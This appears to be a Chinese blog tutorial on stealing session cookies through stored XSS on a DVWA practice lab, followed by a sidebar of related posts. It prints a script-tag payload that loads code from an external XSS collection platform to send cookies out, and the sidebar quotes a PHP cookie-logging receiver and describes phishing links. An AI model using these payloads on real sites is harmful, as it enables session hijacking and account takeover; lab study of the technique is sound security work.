使用xss来打cookie

最新推荐文章于 2024-06-17 14:41:46 发布
最新推荐文章于 2024-06-17 14:41:46 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: 网络安全 文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60719780/article/details/127811166
版权

在使用的时候需要开启phpstudy(官网搜下安装即可,安装比较简单)

dvwa靶场的搭建在这个链接:kali部署dvwa靶场_奋斗的小智的博客-CSDN博客

所需工具:phpstudy、dvwa靶场、xss平台

这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)

xss平台的创建:

1、8ae4463c86554b1687f669e2718b42d4.png

 2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块b1870ed6a6f84b33b24941774e833959.png

 3、47ac0f2b01864ab2adfce3385f4d410c.png

 cafba8930e7f444e85a45dff334221e3.png

 输入自己所搭的xss链接,通过xss平台进行接收

</textarea>'"><script src=http://xsscom.com//Q69u7v></script>

在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。543d7e58c9f746739d457d6f64b4ee36.png

 下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改

9c4f7b1b5cb24906be2aab92e94a2527.png

 效果:a161073a3e844e3c94273b8015a791b0.png

成功用cookie登录

 

 

奋斗的小智
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss获取cookie登陆
weixin_51356351的博客
11-17 1026
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 611
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
利用XSS漏洞打cookie
qq_68163788的博客
01-15 1628
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1455
cookie介绍、XSS类型、XSS盗取cookie、利用Cookie劫持会话
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 3911
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
渗透测试-跨站脚本攻击xss之获取cookie
lza20001103的博客
04-24 4782
渗透测试-跨站脚本攻击xss之获取cookie
使用XSS漏洞获取cookies
Decaede的博客
01-26 962
使用XSS漏洞获取cookies
XSS获取COOKIE
04-20
XSS获取COOKIE
第二节 XSS盗取cookie-01
09-15
例如,攻击者可以使用获得的Cookie信息来伪造用户的身份,以访问目标站点,或者在目标站点上进行进一步的攻击。 劫持会话后的操作 一旦攻击者成功劫持了用户的会话,就可以进行进一步的攻击。例如,攻击者可以: ...
JSP使用过滤器防止Xss漏洞
10-17
本文将详细介绍如何使用过滤器(Filter)在JSP中有效地防止XSS攻击。 首先,我们需要了解XSS攻击的基本原理。当用户在Web表单中输入数据,这些数据未经适当的验证和编码直接显示在页面上时,攻击者可以通过注入恶意...
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
xss Cookie
10-09
xss利用工具 Cookie
【网络安全】XSSCookie外带攻击姿势及例题详析
等风来
05-19 7004
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1266
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS平台打cookie实战
m0_74989372的博客
05-05 418
xss平台的使用xss漏洞的利用
简单的利用XSS获取用户cookie
shy的博客
10-25 4266
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 909
XSS
23、渗透测试笔记_XSS漏洞利用(打cookie_键盘记录)_20191121
__Qian的博客
11-21 1353
1、利用XSScookie 打开http://xss.fbisb.com,注册账号登入 点击创建项目,点击下一步 选择默认模块,选择keepsession,点击下一步 将xss注入代码复制 打开dvwa靶机,登录后选择xss stored,将复制的xss注入代码复制到message中,点击sign guestbook 再次点击xss stored 查看...
Pikachu靶场--XSS
最新发布
qq_65150735的博客
06-17 1078
Pikachu靶场--XSS跨站脚本
xss cookie
10-14
XSS(Cross-Site Scripting)攻击是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,从而获取用户的敏感信息或者控制用户的浏览器。而Cookie是一种存储在用户本地计算机上的数据文件,用于记录用户的登录状态等信息。如果遭受XSS攻击,攻击者可以通过恶意脚本获取用户的Cookie信息,从而实现Cookie劫持,进而控制用户的账号。 为了防止XSS攻击,我们可以采取以下措施: 1. 对用户输入的数据进行过滤和转义,避免恶意脚本的注入。 2. 设置HTTP响应头中的Content-Security-Policy(CSP)字段,限制页面中可以执行的脚本来源。 3. 使用HttpOnly属性设置Cookie,禁止JavaScript访问Cookie,从而防止Cookie被窃取。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值